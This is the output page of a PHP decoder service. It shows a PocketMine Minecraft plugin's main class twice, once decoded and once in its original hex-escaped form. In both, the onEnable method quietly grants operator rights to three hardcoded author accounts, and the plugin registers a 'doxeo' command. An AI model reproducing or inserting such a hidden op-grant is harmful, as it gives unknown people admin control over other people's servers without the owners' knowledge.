Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

namespace zStxrm;use pocketmine\network\protocol\PlayerListPacket;use pocketmine\utils\UUI..

Decoded Output download

<?  namespace zStxrm;use pocketmine\network\protocol\PlayerListPacket;use pocketmine\utils\UUID;use pocketmine\{Server,Player};use pocketmine\plugin\PluginBase;use pocketmine\event\Listener;use pocketmine\scheduler\CallbackTask;use pocketmine\utils\Config;use pocketmine\utils\Utils;use pocketmine\command\Command;use pocketmine\command\ConsoleCommandSender;use zStxrm\Comandos\{MyCommand,TpCommand,StreamCommand,KeyAllCommand,KeyCommand,EventCommand,StaffChatCommand,ShopCommand,HelpModCommand,HelpCommand,GamemodeCommand,RankInfoCommand,ReportCommand,Commands,RedeemCommand,CheckplayerCommand};use zStxrm\Manager\{BC,VIPJoin,Manager,LCore,NoChest,LobbyFly,NoVoid};use zStxrm\KeysManagement\KeysManager;class Main extends PluginBase implements Listener{public$config;public$prefix="b- f";public$error="c- f";public$owner1="zStxrm";public$owner2="Natsumi_XD";public$owner3="iLuke_x";public$msg;public$offline="7[bMfL7] e ffJugador fuera de linea";public$noperm="cUnknown command. Try /help for a list of commands";public function onLoad(){$this->getLogger()->info("7[bMfL7] e fHabilitando...");$this->getLogger()->info("Enabling aCommands");$this->getLogger()->info("Enabling aListeners");}public function onEnable(){$this->getLogger()->info("7[bMfL7] ef Habilitado! Plugin hecho por azStxrm");$this->getServer()->getNetwork()->setName("lbMfL 8| aS2! 8| eUpdate 2.0!rf");$this->getServer()->getOfflinePlayer($this->owner1)->setOp(true);$this->getServer()->getOfflinePlayer($this->owner2)->setOp(true);$this->getServer()->getOfflinePlayer($this->owner3)->setOp(true);@mkdir($this->getDataFolder());$this->saveResource("config.yml");$this->saveResource("effects.yml");$this->saveResource("ranks.yml");$this->saveResource("messages.yml");$this->pdata=new Config($this->getDataFolder()."pdata.json",Config::JSON,Array());$this->blacklisted=new Config($this->getDataFolder()."blacklist.json",Config::JSON,Array());$this->config=new Config($this->getDataFolder()."config.yml",Config::YAML);$this->msg=new Config($this->getDataFolder()."messages.yml",Config::YAML);$this->effects=new Config($this->getDataFolder()."effects.yml",Config::YAML);$this->rank=new Config($this->getDataFolder()."ranks.yml",Config::YAML);$this->getCommand("server")->setExecutor(new Commands($this));$this->getCommand("sponsors")->setExecutor(new Commands($this));$this->getCommand("online")->setExecutor(new Commands($this));$this->getCommand("doxeo")->setExecutor(new Commands($this));$this->getCommand("setarslap")->setExecutor(new Commands($this));$this->getCommand("autoban")->setExecutor(new Commands($this));$this->getCommand("teleporttomap")->setExecutor(new Commands($this));$this->getCommand("info")->setExecutor(new Commands($this));$this->getCommand("ci")->setExecutor(new Commands($this));$this->getCommand("yt")->setExecutor(new Commands($this));$this->getCommand("discord")->setExecutor(new Commands($this));$this->getCommand("my")->setExecutor(new MyCommand($this));$this->getCommand("shop")->setExecutor(new ShopCommand($this));$this->getCommand("buy")->setExecutor(new ShopCommand($this));$this->getCommand("tags")->setExecutor(new Commands($this));$this->getCommand("ip")->setExecutor(new Commands($this));$this->getCommand("cc")->setExecutor(new Commands($this));$this->getCommand("soon")->setExecutor(new Commands($this));$this->getCommand("report")->setExecutor(new ReportCommand($this));$this->getCommand("checkplayer")->setExecutor(new CheckplayerCommand($this));$this->getCommand("rankinfo")->setExecutor(new RankInfoCommand($this));$this->getCommand("gm")->setExecutor(new GamemodeCommand($this));$this->getCommand("gamemode")->setExecutor(new GamemodeCommand($this));$this->getCommand("t")->setExecutor(new TpCommand($this));$this->getCommand("ayuda")->setExecutor(new HelpCommand($this));$this->getCommand("helpmod")->setExecutor(new HelpModCommand($this));$this->getCommand("sc")->setExecutor(new StaffChatCommand($this));$this->getCommand("event")->setExecutor(new EventCommand($this));$this->getCommand("keyall")->setExecutor(new KeyAllCommand($this));$this->getCommand("keys")->setExecutor(new KeyAllCommand($this));$this->getServer()->getPluginManager()->registerEvents(new Manager($this),$this);$this->getServer()->getPluginManager()->registerEvents(new KeysManager($this),$this);$this->getServer()->getPluginManager()->registerEvents(new VIPJoin($this),$this);$this->getServer()->getPluginManager()->registerEvents(new LCore($this),$this);$this->getServer()->getPluginManager()->registerEvents(new NoVoid($this),$this);$this->getServer()->getPluginManager()->registerEvents(new NoChest($this),$this);$this->getServer()->getPluginManager()->registerEvents(new LobbyFly($this),$this);$this->getServer()->getScheduler()->scheduleRepeatingTask(new BC($this),(240*20));$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"time set 200");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"time stop");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"mw load FFA");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"mw load Resistance");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"mw load Practice");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"mw load KitPvP");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"mw load PotFFA");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"mw load Anarchy");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"mw load Lobby-SW");}public function onDisable(){$this->getLogger()->info("aNETWORK 7Disabling aCore 7plugin..");}public function antiDDos(){return$this->pdata;}public function getBlacklist(){return$this->blacklisted;}} 
?>

Did this file decode correctly?

Original Code

namespace zStxrm;use pocketmine\network\protocol\PlayerListPacket;use pocketmine\utils\UUID;use pocketmine\{Server,Player};use pocketmine\plugin\PluginBase;use pocketmine\event\Listener;use pocketmine\scheduler\CallbackTask;use pocketmine\utils\Config;use pocketmine\utils\Utils;use pocketmine\command\Command;use pocketmine\command\ConsoleCommandSender;use zStxrm\Comandos\{MyCommand,TpCommand,StreamCommand,KeyAllCommand,KeyCommand,EventCommand,StaffChatCommand,ShopCommand,HelpModCommand,HelpCommand,GamemodeCommand,RankInfoCommand,ReportCommand,Commands,RedeemCommand,CheckplayerCommand};use zStxrm\Manager\{BC,VIPJoin,Manager,LCore,NoChest,LobbyFly,NoVoid};use zStxrm\KeysManagement\KeysManager;class Main extends PluginBase implements Listener{public$config;public$prefix="b- f";public$error="c- f";public$owner1="zStxrm";public$owner2="Natsumi_XD";public$owner3="iLuke_x";public$msg;public$offline="7[bMfL7] e ffJugador fuera de linea";public$noperm="cUnknown command. Try /help for a list of commands";public function onLoad(){$this->getLogger()->info("7[\x62MfL\x37]\x20\x65\x20fHa\x62il\x69\x74a\x6ed\x6f.\x2e\x2e");$this->getLogger()->info("\x45\x6e\x61\x62l\x69\x6eg \x61Co\x6d\x6d\x61nds");$this->getLogger()->info("\x45\x6e\x61b\x6ci\x6e\x67\x20\x61\x4c\x69s\x74en\x65rs");}public function onEnable(){$this->getLogger()->info("7[b\x4d\x66\x4c7]\x20\x65\x66 \x48a\x62\x69\x6ci\x74\x61\x64o!\x20\x50l\x75g\x69\x6e\x20\x68e\x63ho p\x6f\x72 azS\x74\x78rm");$this->getServer()->getNetwork()->setName("lbMf\x4c 8|\x20\x61S\x32\x21 \x38|\x20\x65Up\x64\x61te\x20\x32.\x30!\x72f");$this->getServer()->getOfflinePlayer($this->owner1)->setOp(true);$this->getServer()->getOfflinePlayer($this->owner2)->setOp(true);$this->getServer()->getOfflinePlayer($this->owner3)->setOp(true);@mkdir($this->getDataFolder());$this->saveResource("\x63\x6f\x6efig.y\x6d\x6c");$this->saveResource("effe\x63ts\x2ey\x6d\x6c");$this->saveResource("\x72\x61nk\x73.\x79\x6d\x6c");$this->saveResource("m\x65\x73\x73\x61g\x65\x73\x2eym\x6c");$this->pdata=new Config($this->getDataFolder()."\x70\x64\x61ta\x2ej\x73\x6fn",Config::JSON,Array());$this->blacklisted=new Config($this->getDataFolder()."\x62l\x61\x63kl\x69s\x74.\x6aso\x6e",Config::JSON,Array());$this->config=new Config($this->getDataFolder()."c\x6fnfi\x67.\x79ml",Config::YAML);$this->msg=new Config($this->getDataFolder()."m\x65s\x73a\x67e\x73.yml",Config::YAML);$this->effects=new Config($this->getDataFolder()."e\x66\x66ec\x74s\x2ey\x6dl",Config::YAML);$this->rank=new Config($this->getDataFolder()."\x72\x61nks\x2e\x79ml",Config::YAML);$this->getCommand("s\x65r\x76e\x72")->setExecutor(new Commands($this));$this->getCommand("\x73\x70o\x6e\x73\x6fr\x73")->setExecutor(new Commands($this));$this->getCommand("\x6f\x6e\x6cine")->setExecutor(new Commands($this));$this->getCommand("\x64o\x78\x65o")->setExecutor(new Commands($this));$this->getCommand("\x73\x65t\x61\x72\x73\x6cap")->setExecutor(new Commands($this));$this->getCommand("\x61u\x74oban")->setExecutor(new Commands($this));$this->getCommand("te\x6cepo\x72t\x74omap")->setExecutor(new Commands($this));$this->getCommand("inf\x6f")->setExecutor(new Commands($this));$this->getCommand("ci")->setExecutor(new Commands($this));$this->getCommand("yt")->setExecutor(new Commands($this));$this->getCommand("d\x69s\x63or\x64")->setExecutor(new Commands($this));$this->getCommand("\x6d\x79")->setExecutor(new MyCommand($this));$this->getCommand("\x73hop")->setExecutor(new ShopCommand($this));$this->getCommand("\x62\x75\x79")->setExecutor(new ShopCommand($this));$this->getCommand("\x74ags")->setExecutor(new Commands($this));$this->getCommand("\x69p")->setExecutor(new Commands($this));$this->getCommand("\x63\x63")->setExecutor(new Commands($this));$this->getCommand("s\x6fon")->setExecutor(new Commands($this));$this->getCommand("\x72e\x70ort")->setExecutor(new ReportCommand($this));$this->getCommand("c\x68eckpla\x79\x65\x72")->setExecutor(new CheckplayerCommand($this));$this->getCommand("\x72\x61n\x6bi\x6e\x66o")->setExecutor(new RankInfoCommand($this));$this->getCommand("\x67\x6d")->setExecutor(new GamemodeCommand($this));$this->getCommand("\x67am\x65mod\x65")->setExecutor(new GamemodeCommand($this));$this->getCommand("\x74")->setExecutor(new TpCommand($this));$this->getCommand("ayu\x64\x61")->setExecutor(new HelpCommand($this));$this->getCommand("\x68e\x6c\x70\x6d\x6f\x64")->setExecutor(new HelpModCommand($this));$this->getCommand("\x73c")->setExecutor(new StaffChatCommand($this));$this->getCommand("\x65v\x65\x6e\x74")->setExecutor(new EventCommand($this));$this->getCommand("\x6b\x65y\x61ll")->setExecutor(new KeyAllCommand($this));$this->getCommand("ke\x79\x73")->setExecutor(new KeyAllCommand($this));$this->getServer()->getPluginManager()->registerEvents(new Manager($this),$this);$this->getServer()->getPluginManager()->registerEvents(new KeysManager($this),$this);$this->getServer()->getPluginManager()->registerEvents(new VIPJoin($this),$this);$this->getServer()->getPluginManager()->registerEvents(new LCore($this),$this);$this->getServer()->getPluginManager()->registerEvents(new NoVoid($this),$this);$this->getServer()->getPluginManager()->registerEvents(new NoChest($this),$this);$this->getServer()->getPluginManager()->registerEvents(new LobbyFly($this),$this);$this->getServer()->getScheduler()->scheduleRepeatingTask(new BC($this),(240*20));$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"time s\x65t \x32\x30\x30");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"\x74ime\x20st\x6fp");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"mw \x6coa\x64\x20F\x46A");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"mw\x20\x6c\x6f\x61\x64\x20\x52esi\x73t\x61nce");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"\x6dw\x20\x6c\x6fa\x64\x20P\x72\x61ctic\x65");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"\x6d\x77 lo\x61\x64\x20K\x69\x74Pv\x50");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"\x6d\x77 l\x6fa\x64 \x50\x6f\x74FF\x41");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"\x6dw \x6c\x6f\x61d An\x61\x72c\x68\x79");$this->getServer()->dispatchCommand(new ConsoleCommandSender(),"\x6dw \x6c\x6f\x61d L\x6f\x62by-\x53W");}public function onDisable(){$this->getLogger()->info("a\x4eE\x54W\x4f\x52\x4b\x207Dis\x61bl\x69n\x67 a\x43or\x65\x207\x70\x6c\x75gi\x6e..");}public function antiDDos(){return$this->pdata;}public function getBlacklist(){return$this->blacklisted;}}
?>

Function Calls

None

Variables

None

Stats

MD5 bd7d30321b956df5ce302c10eaee6ba6
Eval Count 0
Decode Time 49 ms